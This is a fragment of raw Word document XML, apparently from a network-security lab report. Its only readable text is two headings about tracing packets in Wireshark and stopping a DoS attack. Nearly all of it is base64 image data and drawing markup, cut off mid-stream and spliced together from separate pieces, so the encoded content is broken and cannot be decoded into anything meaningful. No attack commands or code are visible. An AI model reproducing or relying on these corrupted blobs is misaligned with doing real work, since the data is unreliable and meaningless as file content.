x4lpXwX17XvDHh7UtMjN9fa5Ndi106NcMLe3C+Zcu5IVE3My5Yj7jEmuq8Lf&#10;soeMddWzk1D7NoccviC38PzxXUyfaIZJVVllEe4b0w6kbTyDkcZI9G8Fa/478B+EPBktp4C8UXOr&#10;aVaanoN9p66VdwNLZXEizJLHMIyEcOWHQn5BkEGo9P8AHXxDg1c3t/8ACbxjrLQa9Za9ZSXv2p54&#10;pLeMRiOST7P+8UoMDhduBjgYouwseD+NPhJ4m8A+ILPStY082j30pjs7h5EMU4EmzIdWKjDcEE5X&#10;vit7xv8As3eOPBHiz+wZNOi1SZ7/APsyC4025jmiln27wmQ2UO3LfOF4BPQGur1W08b654RsNFv/&#10;AIReJZ306S/uLO5FpdL5U1zNHIHKiL5ggRl2k4O/PGK9DtfF3jSay+KGrr8NvEmk614jsoFtrM6X&#10;d3AW/YPFLeQv5QEOIJJlwSTmQYJxwXYWPn/U/gH8QNJ0+yvbjwveNb3jW6wGApMzmcAwfKjFgHyN&#10;pIAPQc1an+AnifTLDxA+rWx0u/0vTRq8dnJtk+2WwmWKV45EYqTGWywzxhuhGK+gvEXjvxd4U1jR&#10;b7wP8LfEc2qx6ZoUN/qt1p16UmaySFzEsJiXZiWMAuCcheMZycjUde8aeKI/Fup33gbxzbXcvh6f&#10;RdM0u+tru+Bkup1Mzq/kKI0WMMdpySdvJOTRdhY+S6K7P/hS3xC/6ETxN/4J7j/4ij/hS3xC/wCh&#10;E8Tf+Ce4/wDiKu6EcZRXZ/8AClviF/0Inib/AME9x/8AEUf8KW+IX/QieJv/AAT3H/xFF0BxlFdn&#10;/wAKW+IX/QieJv8AwT3H/wARR/wpb4hf9CJ4m/8ABPcf/EUXQHGUV2f/AApb4hf9CJ4m/wDBPcf/&#10;ABFH/ClviF/0Inib/wAE9x/8RRdAcZRXZ/8AClviF/0Inib/AME9x/8AEUf8KW+IX/QieJv/AAT3&#10;H/xFF0BxlFdn/wAKW+IX/QieJv8AwT3H/wARR/wpb4hf9CJ4m/8ABPcf/EUXQHGUV2f/AApb4hf9&#10;CJ4m/wDBPcf/ABFH/ClviF/0Inib/wAE9x/8RRdAcZRXZ/8AClviF/0Inib/AME9x/8AEUf8KW+I&#10;X/QieJv/AAT3H/xFF0BxlFdn/wAKW+IX/QieJv8AwT3H/wARR/wpb4hf9CJ4m/8ABPcf/EUXQHGU&#10;V2f/AApb4hf9CJ4m/wDBPcf/ABFH/ClviF/0Inib/wAE9x/8RRdAcZRXZ/8AClviF/0Inib/AME9&#10;x/8AEUf8KW+IX/QieJv/AAT3H/xFF0BxlFdn/wAKW+IX/QieJv8AwT3H/wARR/wpb4hf9CJ4m/8A&#10;BPcf/EUXQHGUV2f/AApb4hf9CJ4m/wDBPcf/ABFH/ClviF/0Inib/wAE9x/8RRdAcZRXZ/8AClvi&#10;F/0Inib/AME9x/8AEUf8KW+IX/QieJv/AAT3H/xFF0BxlFdn/wAKW+IX/QieJv8AwT3H/wARR/wp&#10;b4hf9CJ4m/8ABPcf/EUXQHGUV2f/AApb4hf9CJ4m/wDBPcf/ABFH/ClviF/0Inib/wAE9x/8RRdA&#10;cZRXZ/8AClviF/0Inib/AME9x/8AEUf8KW+IX/QieJv/AAT3H/xFF0BxlFdn/wAKW+IX/QieJv8A&#10;wT3H/wARR/wpb4hf9CJ4m/8ABPcf/EUXQHGUV2f/AApb4hf9CJ4m/wDBPcf/ABFH/ClviF/0Inib&#10;/wAE9x/8RRdAcZRXZ/8AClviF/0Inib/AME9x/8AEUf8KW+IX/QieJv/AAT3H/xFF0BxlFdn/wAK&#10;W+IX/QieJv8AwT3H/wARR/wpb4hf9CJ4m/8ABPcf/EUXQHGUV2f/AApb4hf9CJ4m/wDBPcf/ABFH&#10;/ClviF/0Inib/wAE9x/8RRdAcZRXZ/8AClviF/0Inib/AME9x/8AEUf8KW+IX/QieJv/AAT3H/xF&#10;F0BxlFdn/wAKW+IX/QieJv8AwT3H/wARR/wpb4hf9CJ4m/8ABPcf/EUXQHGUV2f/AApb4hf9CJ4m&#10;/wDBPcf/ABFH/ClviF/0Inib/wAE9x/8RRdAcZRXZ/8AClviF/0Inib/AME9x/8AEUf8KW+IX/Qi&#10;eJv/AAT3H/xFF0BxlFdn/wAKW+IX/QieJv8AwT3H/wARR/wpb4hf9CJ4m/8ABPcf/EUXQHGUV2f/&#10;AApb4hf9CJ4m/wDBPcf/ABFH/ClviF/0Inib/wAE9x/8RRdAcZRXZ/8AClviF/0Inib/AME9x/8A&#10;EUf8KW+IX/QieJv/AAT3H/xFF0BxlFdn/wAKW+IX/QieJv8AwT3H/wARR/wpb4hf9CJ4m/8ABPcf&#10;/EUXQHGUV2f/AApb4hf9CJ4m/wDBPcf/ABFH/ClviF/0Inib/wAE9x/8RRdAcZRXZ/8AClviF/0I&#10;nib/AME9x/8AEUf8KW+IX/QieJv/AAT3H/xFF0BxlFdn/wAKW+IX/QieJv8AwT3H/wARR/wpb4hf&#10;9CJ4m/8ABPcf/EUXQHGUV2f/AApb4hf9CJ4m/wDBPcf/ABFH/ClviF/0Inib/wAE9x/8RRdAcZRX&#10;Z/8AClviF/0Inib/AME9x/8AEUf8KW+IX/QieJv/AAT3H/xFF0BxlFdn/wAKW+IX/QieJv8AwT3H&#10;/wARR/wpb4hf9CJ4m/8ABPcf/EUXQHGUV2f/AApb4hf9CJ4m/wDBPcf/ABFH/ClviF/0Inib/wAE&#10;9x/8RRdAcZRXZ/8AClviF/0Inib/AME9x/8AEUf8KW+IX/QieJv/AAT3H/xFF0BxlFdn/wAKW+IX&#10;/QieJv8AwT3H/wARR/wpb4hf9CJ4m/8ABPcf/EUXQHGUV2f/AApb4hf9CJ4m/wDBPcf/ABFH/Clv&#10;iF/0Inib/wAE9x/8RRdAcZRXZ/8AClviF/0Inib/AME9x/8AEUf8KW+IX/QieJv/AAT3H/xFF0Bx&#10;lFdn/wAKW+IX/QieJv8AwT3H/wARR/wpb4hf9CJ4m/8ABPcf/EUXQHGUV2f/AApb4hf9CJ4m/wDB&#10;Pcf/ABFH/ClviF/0Inib/wAE9x/8RRdAcZRXZ/8AClviF/0Inib/AME9x/8AEUf8KW+IX/QieJv/&#10;AAT3H/xFF0BxlaGg2MepatBbSh2R92QhIPCk9lY9vQ10f/ClviF/0Inib/wT3H/xFaGgfCDx5Zat&#10;BNP4F8SiJd24nRrg9VI6eWfX0pXA88r27UP2ac+GTc6P4lXVPEEOi6drlzo0li0AWG78oIsc5cq7&#10;KZkBBC55x6Vwn/ClviF/0Inib/wT3H/xFevar4r+MOr33hGK4+H/AImuPDegWunWzeHbjTrl7O9+&#10;yIi5lURjIYpuwc7c8ZpN9hnlsnwF8ew69Ho7+HZhePafblbzovI8jfs8wzbvLC7xtyW+9x14q/4k&#10;/Z98U6JpGi39tZy6nHf2cc8ohQAQTSXMtulsDuPmyM0JIVMkgnAwCa9r8VfEbxt4x086NqfwT8V3&#10;Hh2TTjp81s/2n7S2Lv7TG6zC2AXa3y7dhBXjiq9v8S/iXZ+GfCeiQfB3X1tvCUsN5ojvZXLPbXMd&#10;xJJvY+SN6Mknlshx9wMGByKV2Fjyax/Zi8e3Fvr8t3p0GlHR9N/tRhe3cSC4jEyxFY33bWYMTkZ4&#10;24OGKg89qXwV8aaRFA97ob25mtZL1YnniEqwxxiR2aPfuTCMGwwBIIwDXuniDxx8QfEt/rAv/hR4&#10;3vdI1TSptNlsLuW6lMBkuI598Lm3+QB4k+UqcjOTnmsbxtd+K/HHh/StM1D4K+Kbqawt5o11O8ju&#10;ZrxnaFY4h5wt1YxRkbhG5bPTcBRdhY4TwZ8A7zxJ8O5fGV7dX9ppjNOlsNO0afUC3kgGR5mjwsMe&#10;WADMTkhuMLmtiT9mDULHSvDMmo6hfWmoa7LYLCg0SdrKJbpk2B7s4TzAjhyg9MZzXS/DrxD8SvAf&#10;hXStKl+FXiXU7nRJ7u40e5+y3kMcD3KBJBNEIyJl+UMASvOQSQcVf1Txn8RNd8Ntp+pfCHxPdX13&#10;ZafpupXnl3qpcW1o8bRiOMR4hkPlIC4J6HAGTRdgcrdfsr3j+Prjw3Y3utstjZzX99cah4antpFi&#10;SRY1NvCGdrjezALtwD64yRN4S/ZQl8YXutx22v3drBp9/FpwN3oU6TRSvCZN93FnNrCu0gyOSOOm&#10;K6208dfEDS7KHQrD4P8AiyLwj9hurG50+b7bJdzC4kjkdhdeSCm1oY9oCYHzZB3GtTTvi78SrTUJ&#10;biX4O+KFSO7trq0SxF7bswgt0t44bphETdR7IxlW25LP0DYpXkPQ+Q54TBNJHuWTYxXehypweoPc&#10;V7NN+zvYzWmn2Wn+MYrnxfeeH4vEMehz6e8SSxPbfaGijnDsGkEYY4KqDtPNYV14F+KdxZ6vZJ4H&#10;8Q22n6pdLeXFpDoUwTepYrt/d5UDewABx65xXpt5rXjMWunX2nfBbxLZ+LrLw/D4eTWpobqZI4kt&#10;vs7SxwCBQsjIWGSzAbjxVN9hHlviD4DeKNKGpXNpYy3elafDDJcX1x5dqoZ7dJyiq75dlRwcLk4I&#10;OBmtTR/2YfG8vizSNG17TZfD0OozvbC9lCTpFIsTSBHCP8rFVyAxBI5GRXp9x448e3tn4ghvPg14&#10;mvl1W1itxZ3dvcS2MTpZx2yzGBrfmQeWHDqyEHaCSFrqPHHxC8TaT8UL/U/B3wj8SXWlz6zFqt5c&#10;3FneA6i0du8K7FaEGAYmk7Mc4PQYqbsLHzVZfAfx3qenaff2fh6a7tL9xHbyQzRNuZlZ1UgNlSyo&#10;xUMAWxgZNReHvgh458VW9rPpfh25uobq3FzC+5EDxtI0aY3MOWZHCr95tp2ggV9Ar8QPHx8L6b4b&#10;0X4S+I/CKRXumzrqEdpdSw2xtZCRL5C24JZgcucksQcDnFaOr/FX4iad488ato3w08Wr4S1C7gbS&#10;odLs7rTprOO2DJAY28p9qlWYlCvVs5Bp3YWPBPD/AOzz4r1fwTr3ii7spNJ07TbL7XF9qVQ90ftK&#10;W+xULB1G52+crtyhHWofh/8AArXfGvi3XdDnSfTpNBiaXUhb2r3s8eHWMJHDFkyuXYAAHGMkkAV6&#10;rf8AiXxzrHhbUbK/+DXie512+0dNCm1cxXY32qXKzrui8k5k+UKX3DPXGa5rwVY+N/BWu+Kja/Cb&#10;xUfDPiG3azuNJjhvI5o4fNWWMJciIncrIvJU5GQRzRdgVtI/ZjudSttc1KS/1mLRdOvX09JIvDV1&#10;NdvKkaySmW2U5hRA6hmZup4BqDVP2bLuy8HeFdTtbvVr/U/EaWpsoI9DkFjvnmMaxNeb9ofA3bdv&#10;cD3r1G1+LXxQ/tL7VffCHxHdJY6lFqmjwxQ3sQtJY4I4FExEZNwpSGMtu2ksCcjcRXOeGvEXxC8C&#10;6HNH4a+Evimw126NsbrULqK8uYCYZ0nBjtzEFjJeNedzYGQMZpXYaGFJ+yrOvjfT/DC63fi9mhup&#10;5ZJ/D9zCsiwIWb7GHw12WwQoUKT7A1zOp/AO9s/jNa+ALfVYbh5o4riS+kgeI2sDQiZ2niPzRvGm&#10;SyE5BGM817GnxM+IFpqO6z+C/ie3sJ5L+4uo2F69yJ7tUWR7e4MW6DAjG0AMQCwJOazdI1Txrrfx&#10;w07xNrXw38UaZoz6W+g3Uh0y7u7kW8lu8DTyyeWGmkAk3FsAkKABwKLsNDgbb9nBNQ0zwzqNh4y0&#10;y/0/VBqU17dQwTeXpsFlFFNM75ALtslHyqMbhjcc5CSfs8Wtvbvrtx4vgi8C/wBnQ6jHrwsJGkkE&#10;szQLF9nzkSeZHICN2MITk9K6HwjcfEbwTo+h6JH8L9e1XTdOm1WO6Emm3aLqFrfRRQyx/wCqBj+W&#10;LIbk5YccYOmde8az2U3h65+CviKbwK2nQ6dFoggu1mi8qd51l+0+Tkv5kkuTsxhyMDrTuwPMY/gV&#10;qKfFjUvBVzqdrbx6dBLfXOsbWaBbNIfP88LjcQ0e0hepLAcV2Phn9k6bxZrsENh4qt5NEvrC0vdO&#10;1P7DIWn+03LW0aPEDmPEsbhzk7QAfmyK1Ita+IJ8c3vim5+D2vXF7fme0vIPsV4sMmmyWwt1s1Xy&#10;zt2KMiTJOQMjjmOPWvibp/jjw5quk/DTxhpGgaHYx6ZDolpHeobi1WV5WjmmEYLh5JGLfKARxgYF&#10;F2Bxmqfs6a34e1PwXa6zJPpsPiB4YZ9RexkazsJZnIiiaYfK7lNrso5UN3wa8z13RLzw3reoaTfx&#10;GG9sJ3tp4z/C6MVYfmK+qY/G3xH8fWuj6J4x+H/iS2SXULV9W14aZeSA2sV3Lc4S3WLCybpmXeDy&#10;oUYHJry7xtonxS8TeLPGupWvgfxNaWXie9kuLm2/sSY7kMpkRcmMkYOOhFNN9QDw/wDs/ab4g0Tw&#10;aq+M4rPxT4ttZLjTNIudPcQSMtxLAkRuA5w7tEcZTGWAJ71zX/DP/wAQM6Xnw3OP7Th+02uZohvh&#10;27/Nb5vkTH8bYXtnPFeqaLqni/RNB8F7Pgp4kuPFPhK1kt9N1eeG6MCO1xLOkpthAMujSnGXxlQS&#10;D0qGHWPiJPrf2jVPhL4j1HTbjwzb+GdQs/sd1HJcRxKmJUlEX7ti6K2NrDqDnNK7A82sf2dfiPqM&#10;t/Fb+FLx5bGcWs0ZaNW80oJFRAWBkLIQy7M7geM1n3HwT8cW3haHxE/hy6OkSxJOkyFHcxu+xX8s&#10;EuFL/LuK4zxnNfS9n438Qr4Ngur34Q+JLvXdL12zutF0tbS+jSzgtbNIYHkk8k+dygDLlSTyMCqP&#10;iHxd4x0rTPDl74d+GPiS58Yjw7BpuoazNpt2IoWF41y8QtzCAW3BPnDEYYjGRmjmYWPALn4AfEKz&#10;1e00ybwvdx3l0kkiAsmxRHjzd77tsZTI3ByCuRnGRW54g+DGt/Cb4iw2d8Bc21pPZQy3ibQonntI&#10;7rysBiTtWQjcODtz3xXrPiP4lfEXxVrN9NqXwl8Z3mkapaXVpqGlXD3bx4neKRmtj5GYSHhQjO/I&#10;GCTXI+LdP8U+O/HCa43wi8T6LcGayRJRbXc4itrezjthGVMQDEmIPv4IzjHei76gfeenWUMGm2aT&#10;XJSTyIyVWMnGVB65orzi3+NVyttAk/w28XySpGqM66bOoYgAZx5ftRXNZln3VRRRS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HqHUyLgAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxMj01rg0AQhu+F&#10;/odlAr01q0ZLYlxDCG1PoZCkUHrb6EQl7qy4GzX/vtNTexpe5uH9yDaTacWAvWssKQjnAQikwpYN&#10;VQo+T2/PSxDOayp1awkV3NHBJn98yHRa2pEOOBx9JdiEXKoV1N53qZSuqNFoN7cdEv8utjfas+wr&#10;WfZ6ZHPTyigIXqTRDXFCrTvc1Vhcjzej4H3U43YRvg7762V3/z4lH1/7EJV6mk3bNQiPk/+D4bc+&#10;V4ecO53tjUonWtZxkjCqIIr5MrBaLXjcWUESxUuQeSb/T8h/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MSKTNcQMAAGwIAAAOAAAAAAAAAAAAAAAAADwCAABkcnMv&#10;ZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQC1OrC3IN4DACDeAwAVAAAAAAAAAAAAAAAAANkFAABk&#10;cnMvbWVkaWEvaW1hZ2UxLmpwZWdQSwECLQAUAAYACAAAACEAeodTIuAAAAAKAQAADwAAAAAAAAAA&#10;AAAAAAAs5AMAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAFhgsxu6AAAAIgEAABkAAAAA&#10;AAAAAAAAAAAAOeUDAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB9AQAAKuYD&#10;AAAA&#10;">
                <v:shape id="Image 58" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:95;top:94;width:53626;height:31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3URvgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7WVMFlqUYRQRBlD1vF89CMbbGZlCTW+u+dw8IeH+97tRlcq3oKsfFsYDbNQBGX3jZc&#10;Gbic95/foGJCtth6JgMvirBZjz5WmFv/5F/qi1QpCeGYo4E6pS7XOpY1OYxT3xELd/PBYRIYKm0D&#10;PiXctXqeZV/aYcPSUGNHu5rKe/Fw0lud9ueHtwt9DWF+/SmOfRfQmMl42C5BJRrSv/jPfbAGFjJW&#10;vsgP0Os3AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAAAAAA&#10;AAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMDrdRG+AAAA2wAAAA8AAAAAAAAA&#10;AAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAADyAgAAAAA=&#10;">
                  <v:imagedata r:id="rId48" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 59" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:53721;height:31674;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5372100,316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1PfwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RasJA&#10;FETfC/7DcgXfmo2CwaauIoJoIVCS9gMu2WsSzN6N2dXEfn23UPBxmJkzzHo7mlbcqXeNZQXzKAZB&#10;XFrdcKXg++vwugLhPLLG1jIpeJCD7WbyssZU24Fzuhe+EgHCLkUFtfddKqUrazLoItsRB+9se4M+&#10;yL6SuschwE0rF3GcSIMNh4UaO9rXVF6Km1FQ7LM57s7u5zKyOV7zj2v26ROlZtNx9w7C0+if4f/2&#10;SStYvsHfl/AD5OYXAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAIvNT38MAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,3167126r5372100,l5372100,,,,,3167126xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Wire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Shark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>trace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394C1CB2" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="510"/>
        </w:tabs>
        <w:spacing w:before="23"/>
        <w:ind w:left="510" w:hanging="150"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stopping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F5B4C0" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="4"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487596544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5350278C" wp14:editId="450A095D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>940435</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>46670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3678554" cy="2266315"/>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78554" cy="2266315"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3678554" cy="2266315"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="61" name="Image 61"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId49" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9525"/>
                            <a:ext cx="3659504" cy="2247265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="62" name="Graphic 62"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="3669029" cy="2256790"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3669029" h="2256790">
                                <a:moveTo>
                                  <a:pt x="0" y="2256789"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3669029" y="2256789"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3669029" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="22567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256AD3" id="Group 60" o:spid="_x0000_s1026" style="position:absolute;margin-left:74.05pt;margin-top:3.65pt;width:289.65pt;height:178.45pt;z-index:-15719936;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="36785,22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WT1BrAwAAbAgAAA4AAABkcnMvZTJvRG9jLnhtbJxWbW/TMBD+jsR/&#10;sPydpQtrtkbrEGIwTUIwwRCfXcdJLBzb2O7L/j13dpyWFsRLpSbn+nx+/Nxz516/2g2KbITz0ugl&#10;PT+bUSI0N43U3ZJ+eXz34ooSH5humDJaLOmT8PTVzfNn11tbi9L0RjXCEQiifb21S9qHYOui8LwX&#10;A/NnxgoNk61xAwswdF3ROLaF6IMqytmsKrbGNdYZLryHX2/TJL2J8dtW8PCxbb0IRC0pYAvx6eJz&#10;hc/i5prVnWO2l3yEwf4DxcCkhk2nULcsMLJ28iTUILkz3rThjJuhMG0ruYhngNOcz45Oc+fM2saz&#10;dPW2sxNNQO0RT/8dln/Y3Dn72T64hB7M94Z/88BLsbVdfTiP427vvGvdgIvgEGQXGX2aGBW7QDj8&#10;+LK6vJrPLyjhMFeWVfXyfJ445z0k5mQd79/+YWXB6rRxhDfBsZLX8B0pAuuEoj9LCVaFtRN0DDL8&#10;VYyBuW9r+wKyaVmQK6lkeIrKhLwhKL15kBzZxQGw+eCIbJa0OqdEswEq4n5gnSAwBsqzD67ADJwE&#10;WClp30mlkHe0R6gg6CNB/OK0SWy3hq8HoUOqHicUoDba99J6SlwthpUAeO6+AYAcKjcAROukDilt&#10;PjgReI/7t4DjExQYAmX1NBFB73HiEfworyPFLOblnBIQRjQgDKv3upkv5rNJNxeXZRV1M2Wf1db5&#10;cCfMQNAAxIAEKGc127z3I6bsMjKZYER8gApbBPQcnzmE0QmL/1RWn3tmBUDAsAeJLnOi78YuU5VI&#10;5eiFlTeOfsPSxSUsQJaiccRStZiVi1xd8+pyETvaAUt8nVg6ZAa6VJM4Arb6bPGdziZyiQ1TxYYZ&#10;QBfALyXQMFdJBSB1XIdB0SRbrPQRS4+FnqDg/GA24tFEz7Av9+hxtcBoAHbvo/Sh7xQzNg+IOa3I&#10;fvltY+xD/0xE9sjv5AlXAcT8G5+fkeYoXBkvEngkIJ5iIgVOdEi70shP1DjS4I2STa5h77rVG+XI&#10;huH9FD8jJz+5oZBvme+TX5wa3ZSGvVFLST1orUzzBF1mC3JbUv99zbClqXsN8sYbMBsuG6tsuKDe&#10;mHhPxnTBno+7r8zZscICFOcHk1V+UmjJF1dq83odTCtjFe4RjUCh4qIVr7RI3Hj94p15OI5e+z8J&#10;Nz8AAAD//wMAUEsDBAoAAAAAAAAAIQBNNbCATVYBAE1WAQAVAAAAZHJzL21lZGlhL2ltYWdlMS5q&#10;cGVn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoM&#10;DAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAJEA7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Hr7F/Zi/4Jy6r+0N8MLTxvd+NYPC2n38sqWVuumfbHlSJ3iZ2/exbTvVv733a+Oq+kfgL+3v8TP2&#10;evBCeE9Et9E1jRYZXltYtYtpZXt97bnRHilT5d29vn/v10zMj6T/AOHOX/VXf/LZ/wDuuj/hzl/1&#10;V3/y2f8A7rrzf/h7d8X/APoW/BH/AIA3n/yVR/w9u+L/AP0Lfgj/AMAbz/5KrP3yvdPn39p39nfV&#10;P2Zfia/hDUtTg1hJLOK/s723i8rz4Gdl+dP4G3RMv32+7WFqvwW8Q6P4Bt/F8/2T+zJYopdiSv5q&#10;LLs2O6bP9tP46X42fGvxN+0B45k8VeK54Gv2gW3ihtI/KigiX7qqv9353/j/AI6xrz4keJtS8KRe&#10;HLnVZZtEi2ItptT+H7nz7N1WSc1RRRWoBXvf7KPwH8MfGPV9Yn8carqGieGrKWw02K40xoklbUry&#10;4SK3T5kddv8ArWf/AHK8Er3zwL+0zb/Cj4K6N4U8MeHNO1XXZdbn1vWrjxLpcF5bq6Ki2n2Xc7fM&#10;i7m3bV2s/wAtZAch4b/Zx+IHjDXfFGk6HoQv7nw1qC6bqrPe29utrOzyou5pXT7zwS/P/wDFpT9B&#10;/Zj+JviTW/EekWPhWT+0PDl1FZatFd3UFv8AY5Zd/lb3ldF2v5T/AD/c+5/fSvo5/iL8N/i/4F/a&#10;E8Y6raeJNK8P6zc+FbjUbfS7e3+0RX/+lJL5SPLteJpVZvmdW+eoYfip4Q+N/gb9o3xb4ss9e0rw&#10;peX3he3ii0nyrjUIkgS4iid/N2K